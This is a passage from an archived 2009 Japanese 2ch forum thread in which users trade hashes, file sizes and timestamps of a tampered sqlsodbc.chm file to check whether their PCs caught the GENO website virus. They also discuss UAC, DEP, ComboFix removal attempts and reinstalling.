注意)
131:名無しさん@お腹いっぱい。
09/04/08 23:07:21
ビスタも感染するんですよね?しないって言ってる人もいるけど
132:名無しさん@お腹いっぱい。
09/04/08 23:07:55
申し訳ありませんが
sqlsodbc.chm
と
sqlsodbc
は同一の扱いなのでしょうか?
133:名無しさん@お腹いっぱい。
09/04/08 23:08:48
>>131
する
>>132
拡張子表示させれ
134:名無しさん@お腹いっぱい。
09/04/08 23:17:14
>>132
sqlsodbcというファイル名は一つしかないから
同じ。
拡張子を表示する設定
URLリンク(www.cdwavmp3.com)
135:名無しさん@お腹いっぱい。
09/04/08 23:18:51
UACあってもVistaで感染するの?そのためのUACだと思ってたんだが
ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして
136:名無しさん@お腹いっぱい。
09/04/08 23:20:40
>>135
vistaで踏んだあとxpで再び踏んだら多分アウト
137:名無しさん@お腹いっぱい。
09/04/08 23:21:14
>>1
>WINDOWSの正規ファイルを上書き(?)する可能性大
この時点でUAC発動してバレバレだしな
138:名無しさん@お腹いっぱい。
09/04/08 23:24:16
>>133>>134
申し訳ありませんでした
139:名無しさん@お腹いっぱい。
09/04/08 23:25:57
GENOウイルススレ
スレリンク(sec板)
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
スレリンク(news板)
【新種ウイルス】GENOを語るスレ31【無料配布中】
スレリンク(pc板)
【ウイルス】GENOを語るスレ31【完治】
スレリンク(pc板)
【8BOAA】 GENOを語るスレ26 【zif付き】
スレリンク(notepc板)
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
スレリンク(jisaku板)
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
スレリンク(sec2chd板)
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
スレリンク(pcnews板)
PC通販サイト「GENO」のサイトに改ざんの疑い
スレリンク(news板)
140:名無しさん@お腹いっぱい。
09/04/08 23:26:11
UACあってもUserが許可しちゃえば感染するだろ
もう一回感染実験してくるノシ
141:名無しさん@お腹いっぱい。
09/04/08 23:27:39
CRCは家の環境でも上のやつで一致でした。
142:名無しさん@お腹いっぱい。
09/04/08 23:30:31
旧プログラムw
143:名無しさん@お腹いっぱい。
09/04/08 23:34:20
XPでもDEP有効にしてれば防げるのか?
144:名無しさん@お腹いっぱい。
09/04/08 23:42:46
XPsp2なんだけど、
sqlsodbc.chm
C:\WINDOWS\system32
1.29 KB (1,323 バイト)
MD5:BF7209B9589AD09A25740F6D47D0ADEA
CRC32:7585CBB6
SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
ファイルサイズからして全然違う。
アウトかね
145:名無しさん@お腹いっぱい。
09/04/08 23:43:04
>>143
まだわかんない。
ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。
それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。
146:名無しさん@お腹いっぱい。
09/04/08 23:43:45
>>144
おそらくそれはご愁傷様コース。
多分確実に食らってる。
147:名無しさん@お腹いっぱい。
09/04/08 23:44:23
>>144
PC挙動もおかしいですか?
148:名無しさん@お腹いっぱい。
09/04/08 23:48:43
>144
タ、タイムスタンプは?タイムスタンプは変わったの?
149:名無しさん@お腹いっぱい。
09/04/08 23:48:53
>147
2日前、
WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。
IEとプニルがすぐ落ちる等、挙動がおかしかったんで、
avast入れてスキャンするも何も検出されず。
システムの復元は普通にブラウジング出来たんで、
クリンインスコせずに今に至る。
面倒くさがらずにクリンインスコするか
150:名無しさん@お腹いっぱい。
09/04/08 23:49:04
sqlsodbc.chmの
更新日時が1年前だったが、これは大丈夫かな?
151:名無しさん@お腹いっぱい。
09/04/08 23:52:41
>>149
d
残念ながらアウツですな
152:名無しさん@お腹いっぱい。
09/04/08 23:53:07
>148
作成日時:2005年3月29日、17:20:39
更新日時:2007年4月17日、0:53:08
153:名無しさん@お腹いっぱい。
09/04/08 23:53:31
>>150
今すぐファイルサイズ確認しれw
154:名無しさん@お腹いっぱい。
09/04/08 23:58:49
>>152
重要な情報だわ。
なんかそのハンパな日時が肝なのかもね。
基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。
155:名無しさん@お腹いっぱい。
09/04/08 23:59:32
>>153
作成日時2009年4月1日、21:20:18
更新日時2008年4月14日、21:00:00
50,727 バイト
156:名無しさん@お腹いっぱい。
09/04/09 00:03:39
avastで踏むも更新前だったのでスルー
その後a-squadで検出・削除
readerは8.14、フラッシュは最新だったと思う
不気味な事に不審な挙動全く無し・異常なし・・・
これってもうゾンビにされてる?
157:名無しさん@お腹いっぱい。
09/04/09 00:05:55
>>156
a-squadだと踏んだ後でも検出されるんだ、ヨカタ。
一度踏んだとなると怖いね。
今話題のsqlsodbc.chmも調べてみれば?
といっても感染したのは確定してるのか
158:名無しさん@お腹いっぱい。
09/04/09 00:06:13
>>155
>>92
セーフっぽいね
159:144
09/04/09 00:06:39
人柱となった代わりに、
踏み台にされると実際どんな被害があるのか教えてくれないか?
とりあえず、すぐにでも再インスコした方がいいよね…
160:名無しさん@お腹いっぱい。
09/04/09 00:07:14
えと、最近使ったファイルに最近使った試しのないファイルがどんどん出ているけど
まさかこれ暴れだしたってことだろうか
161:名無しさん@お腹いっぱい。
09/04/09 00:07:24
>>99ダタ
162:名無しさん@お腹いっぱい。
09/04/09 00:08:56
数回にわたる作業の末やっとましな結果が出た。
Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成
で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離
再起動後、レジストリエディタ起動、特定のサイト
(bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、
ブラウザ安定でかなりいい結果じゃないかと。
bxatg.mnnの検体は可否スレに報告しておきます。
で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗
一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを
ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。
二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・
三回目(今回)再びセーフモードで以上の結果でした。
もうちょっと検証必要っぽいので"ComboFixを過信"しないように
またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm
は今のところ実害なし(?)この改変されたやつのハッシュは
ae325e35760718d46bcebc4ad5fab953
163:名無しさん@お腹いっぱい。
09/04/09 00:09:06
>>158
よかった!ありがとう!
でも不思議なことにantivirが定期的にバックドアーを検出するんだよ
これとはまた別の何かかもしれないが
164:名無しさん@お腹いっぱい。
09/04/09 00:11:14
>>163
俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる
165:名無しさん@お腹いっぱい。
09/04/09 00:12:37
>>159への害はPC激重、キーロガーでこれから打つキー情報抜かれるかもetc.。
でも最インスコすれば失った時間と消すことになるデータ以外は解決
ほっといた場合>>159のパソコン経由で悪さされるかも
166:名無しさん@お腹いっぱい。
09/04/09 00:12:40
c:\windows\system32\sqlsodbc.chm
のsqlsodbc.chmが見つからない!
osはXP sp3 何かソフトいれないとだめなの?
167:名無しさん@お腹いっぱい。
09/04/09 00:12:56
>>159
リカバリは当然したほうがいいでそ。
実際何送信してるのかは未確定なのかな。
>>160
ファイル名うpればみんなの助けになるかも
168:名無しさん@お腹いっぱい。
09/04/09 00:15:19
>>159
このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。
あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。
それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。
とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。
169:名無しさん@お腹いっぱい。
09/04/09 00:15:40
>165
再インスコ前に、
専ブラのログ、各種アプリ設定ファイル、エロ画像
諸々バックアップしときたいんだけど、
それにもウィルスくっ付いてくる可能性はある?
170:名無しさん@お腹いっぱい。
09/04/09 00:15:46
俺のsqlsodbcは更新が2002年8月31日、21:00:00だぜ
ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど
誰か同じ人いる?
171:162
09/04/09 00:19:10
sqlsodbc.chmは
サイズ 1,323バイト
ディスク上のサイズが 4,096バイト
172:名無しさん@お腹いっぱい。
09/04/09 00:20:38
>>171
作成日時と更新日時は?
>>152さんと一緒?
173:名無しさん@お腹いっぱい。
09/04/09 00:21:11
>>167
今のところだいぶ前に落としたり自分で作ったファイルなどが最近アクセスされた扱いになってる
今のところ更新はされていないようだけどこの先はどうなるかわからない
174:名無しさん@お腹いっぱい。
09/04/09 00:21:34
>>157
作成日時 2006年3月2日、21:00:00
更新日時 2006年3月2日、21:00:00
ハッシュ:F639AFDE02547603A3D3930EE4BF8C12
175:名無しさん@お腹いっぱい。
09/04/09 00:22:34
>>148
イサキを思い出す。
人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。
他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。
sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。
176:名無しさん@お腹いっぱい。
09/04/09 00:23:00
有名な店だから決行感染してるんじゃないか
感染にすら気づいてない奴がほとんどだと思う
177:名無しさん@お腹いっぱい。
09/04/09 00:25:27
>>169
各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい
このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を
ありきたりの事しかいえなくてすまないね
178:名無しさん@お腹いっぱい。
09/04/09 00:26:42
流れをまとめるとこんな感じであってるだろうか
URLリンク(www29.atwiki.jp)
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5389日前に更新/249 KB
担当:undef